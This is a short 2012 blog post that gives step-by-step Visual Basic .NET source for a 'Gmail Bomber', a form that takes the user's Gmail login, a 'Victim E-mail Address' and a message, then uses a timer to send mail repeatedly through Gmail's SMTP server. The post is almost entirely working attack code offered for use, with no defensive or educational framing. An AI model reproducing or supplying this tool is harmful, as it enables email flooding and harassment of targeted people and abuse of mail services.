Saturday, 7 January 2012
[SOURCE] GMAIL Bomber
Do you like this story?
Add a Timer, 5 textboxes, button
textbox1 = Gmail Username
textbox2 = Gmail Password
textbox3 = Victim E-mail Address
textbox4 = Subject
textbox5 = Message
button1.text = send!
Add on Top Of "Public Class Form1"
Imports System.Net.Mail
Double Click Button1 and write:
timer1.start
then Double click Timer1 and write:
Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress(TextBox1.Text) MyMailMessage.To.Add(TextBox3.Text) MyMailMessage.Subject = (TextBox4.Text) MyMailMessage.Body = TextBox5.Text Dim SMTPServer As New SmtpClient("smtp.gmail.com") SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text) SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) MsgBox("Email Has been sent Successfully ;)")
This post was written by: Franklin Manuel
Franklin Manuel is a professional blogger, web designer and front end web developer. Follow him on Twitter
Subscribe to:
Post Comments (Atom)
0 Responses to “[SOURCE] GMAIL Bomber”
Post a Comment